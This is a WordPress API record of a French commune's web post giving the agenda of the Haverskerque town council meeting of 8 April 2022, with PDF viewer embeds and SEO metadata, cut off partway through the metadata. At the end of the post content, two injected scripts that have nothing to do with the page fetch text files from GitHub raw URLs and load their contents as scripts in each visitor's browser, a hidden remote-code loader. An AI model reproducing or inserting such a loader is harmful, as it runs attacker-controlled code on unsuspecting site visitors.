{"id":581,"date":"2022-04-09T13:14:00","date_gmt":"2022-04-09T11:14:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=581"},"modified":"2024-07-29T06:38:48","modified_gmt":"2024-07-29T04:38:48","slug":"conseil-municipal-du-08-avril-2022","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/","title":{"rendered":"Conseil Municipal du 08 Avril 2022"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR<\/h3>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 18 mars 2022<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Informations au Conseil Municipal<\/p>\n\n\n\n<p><strong>FINANCES<\/strong><\/p>\n\n\n\n<p>1. Fiscalit\u00e9 2022.<br>2. Vote du compte de gestion 2021 &#8211; Ville.<br>3. Vote du compte administratif 2021 &#8211; Ville.<br>4. Affectation des r\u00e9sultats 2021 &#8211; Ville.<br>5. Vote du budget primitif 2022 &#8211; Ville.<br>6. Attribution de subventions aux associations 2022.<br>7. Convention d\u2019objectifs et de moyens 2022 entre l\u2019OMAF et la commune &#8211; Autorisation de signature.<br>8. Attribution de subventions aux personnes de droit priv\u00e9 2022.<br>9. \u00c9tat r\u00e9capitulatif des indemnit\u00e9s des \u00e9lus pour 2022.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR COMPL\u00c9MENTAIRE<\/h3>\n\n\n\n<p><strong>FINANCES<\/strong><\/p>\n\n\n\n<p>10. Sollicitation du fonds de concours aupr\u00e8s de la Communaut\u00e9 de Communes Flandre Lys &#8211; Remplacement des a\u00e9rothermes de la salle Victor Dehaine.<\/p>\n\n\n\n<p><strong>CCAS<\/strong><\/p>\n\n\n\n<p>11. Cession d\u2019une parcelle appartenant \u00e0 la soci\u00e9t\u00e9 IMWO &#8211; Autorisation de signature des actes notari\u00e9s.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2005\"  _slug=\"ordre-du-jour-de-la-seance-du-08-avril-2022\" data-title=\"ordre-du-jour-de-la-seance-du-08-avril-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 08 Avril 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2005 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convocation_cm_08042022.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2002\"  _slug=\"proces-verbal-de-la-seance-du-08-avril-2022\" data-title=\"proces-verbal-de-la-seance-du-08-avril-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Proc\u00e8s-verbal de la s\u00e9ance du 08 Avril 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2002 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/pvcm08042022.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1999\"  _slug=\"affectation-des-resultats\" data-title=\"affectation-des-resultats\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Affectation des r\u00e9sultats<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1999 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/affectation_des_resultats-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1996\"  _slug=\"attribution-de-subventions-aux-associations-pour-2022\" data-title=\"attribution-de-subventions-aux-associations-pour-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Attribution de subventions aux associations pour 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1996 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/attribution_de_subventions_aux_associations_2022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1993\"  _slug=\"attribution-de-subventions-aux-personnes-de-droit-prive-pour-2022\" data-title=\"attribution-de-subventions-aux-personnes-de-droit-prive-pour-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Attribution de subventions aux personnes de droit priv\u00e9 pour 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1993 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/attribution_de_subventions_aux_personnes_de_droit_prive_2022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1990\"  _slug=\"cession-de-parcelle-du-ccas\" data-title=\"cession-de-parcelle-du-ccas\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Cession de parcelle du CCAS<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1990 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/cession_de_parcelle_du_ccas-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1987\"  _slug=\"convention-dobjectifs-et-de-moyens-entre-la-commune-et-lomaf\" data-title=\"convention-dobjectifs-et-de-moyens-entre-la-commune-et-lomaf\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Convention d\u2019objectifs et de moyens entre la commune et l\u2019OMAF<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1987 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convention_d_objectifs_et_de_moyens_entre_la_commune_et_l_omaf_2022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1984\"  _slug=\"etat-des-indemnites-des-elus\" data-title=\"etat-des-indemnites-des-elus\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >\u00c9tat des indemnit\u00e9s des \u00e9lus<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1984 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/etat_des_indemnites_elus.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1981\"  _slug=\"fiscalite-2022\" data-title=\"fiscalite-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Fiscalit\u00e9 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1981 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/fiscalite_2022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1978\"  _slug=\"sollicitation-du-fonds-de-concours-aupres-de-la-ccfl-pour-le-remplacement-des-aerothermes-salle-victor-dehaine\" data-title=\"sollicitation-du-fonds-de-concours-aupres-de-la-ccfl-pour-le-remplacement-des-aerothermes-salle-victor-dehaine\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Sollicitation du fonds de concours aupr\u00e8s de la CCFL pour le remplacement des a\u00e9rothermes salle Victor Dehaine<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1978 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/sollicitation_du_fond_de_concours_aupres_de_la_ccfl_pour_le_remplacement_des.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1975\"  _slug=\"vote-du-budget-primitif-de-la-ville-pour-2022\" data-title=\"vote-du-budget-primitif-de-la-ville-pour-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Vote du budget primitif de la ville pour 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1975 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/vote_du_budget_primitif_de_la_ville_2022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1972\"  _slug=\"vote-du-compte-administratif-2021\" data-title=\"vote-du-compte-administratif-2021\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Vote du compte administratif 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1972 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/vote_du_compte_administratif_2021-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1967\"  _slug=\"vote-du-compte-de-gestion-2021\" data-title=\"vote-du-compte-de-gestion-2021\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Vote du compte de gestion 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1967 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/vote_du_compte_de_gestion_2021-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 18 mars 2022&nbsp;Informations au Conseil Municipal FINANCES 1. Fiscalit\u00e9 2022.2. Vote du compte de gestion 2021 &#8211; Ville.3. Vote du compte administratif 2021 &#8211; Ville.4. Affectation des r\u00e9sultats 2021 &#8211; Ville.5. Vote du budget primitif 2022 &#8211; Ville.6. Attribution de subventions aux associations 2022.7. Convention d\u2019objectifs et de moyens 2022 entre l\u2019OMAF et la commune &#8211; Autorisation de signature.8. Attribution de subventions aux personnes de droit priv\u00e9 2022.9. \u00c9tat r\u00e9capitulatif des indemnit\u00e9s des \u00e9lus pour 2022. ORDRE DU JOUR COMPL\u00c9MENTAIRE FINANCES 10. Sollicitation du fonds de concours aupr\u00e8s de la Communaut\u00e9 de Communes Flandre Lys &#8211; Remplacement des a\u00e9rothermes de la salle Victor Dehaine. CCAS 11. Cession d\u2019une parcelle appartenant \u00e0 la soci\u00e9t\u00e9 IMWO &#8211; Autorisation de signature des actes notari\u00e9s.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-581","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 08 Avril 2022 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 08 Avril 2022 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 18 mars 2022&nbsp;Informations au Conseil Municipal FINANCES 1. Fiscalit\u00e9 2022.2. Vote du compte de gestion 2021 &#8211; Ville.3. Vote du compte administratif 2021 &#8211; Ville.4. Affectation des r\u00e9sultats 2021 &#8211; Ville.5. Vote du budget primitif 2022 &#8211; Ville.6. Attribution de subventions aux associations 2022.7. Convention d\u2019objectifs et de moyens 2022 entre l\u2019OMAF et la commune &#8211; Autorisation de signature.8. Attribution de subventions aux personnes de droit priv\u00e9 2022.9. \u00c9tat r\u00e9capitulatif des indemnit\u00e9s des \u00e9lus pour 2022. ORDRE DU JOUR COMPL\u00c9MENTAIRE FINANCES 10. Sollicitation du fonds de concours aupr\u00e8s de la Communaut\u00e9 de Communes Flandre Lys &#8211; Remplacement des a\u00e9rothermes de la salle Victor Dehaine. CCAS 11. Cession d\u2019une parcelle appartenant \u00e0 la soci\u00e9t\u00e9 IMWO &#8211; Autorisation de signature des actes notari\u00e9s.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2022-04-09T11:14:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 08 Avril 2022\",\"datePublished\":\"2022-04-09T11:14:00+00:00\",\"dateModified\":\"2024-07-29T04:38:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/\"},\"wordCount\":142,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/\",\"name\":\"Conseil Municipal du 08 Avril 2022 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2022-04-09T11:14:00+00:00\",\"dateModified\":\"2024-07-29T04:38:48+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/04\\\/09\\\/conseil-municipal-du-08-avril-2022\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 08 Avril 2022\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 08 Avril 2022 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 08 Avril 2022 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 18 mars 2022&nbsp;Informations au Conseil Municipal FINANCES 1. Fiscalit\u00e9 2022.2. Vote du compte de gestion 2021 &#8211; Ville.3. Vote du compte administratif 2021 &#8211; Ville.4. Affectation des r\u00e9sultats 2021 &#8211; Ville.5. Vote du budget primitif 2022 &#8211; Ville.6. Attribution de subventions aux associations 2022.7. Convention d\u2019objectifs et de moyens 2022 entre l\u2019OMAF et la commune &#8211; Autorisation de signature.8. Attribution de subventions aux personnes de droit priv\u00e9 2022.9. \u00c9tat r\u00e9capitulatif des indemnit\u00e9s des \u00e9lus pour 2022. ORDRE DU JOUR COMPL\u00c9MENTAIRE FINANCES 10. Sollicitation du fonds de concours aupr\u00e8s de la Communaut\u00e9 de Communes Flandre Lys &#8211; Remplacement des a\u00e9rothermes de la salle Victor Dehaine. CCAS 11. Cession d\u2019une parcelle appartenant \u00e0 la soci\u00e9t\u00e9 IMWO &#8211; Autorisation de signature des actes notari\u00e9s.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2022-04-09T11:14:00+00:00","article_modified_time":"2024-07-29T04:38:48+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 08 Avril 2022","datePublished":"2022-04-09T11:14:00+00:00","dateModified":"2024-07-29T04:38:48+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/"},"wordCount":142,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/","name":"Conseil Municipal du 08 Avril 2022 * Haverskerque, 100% Nature 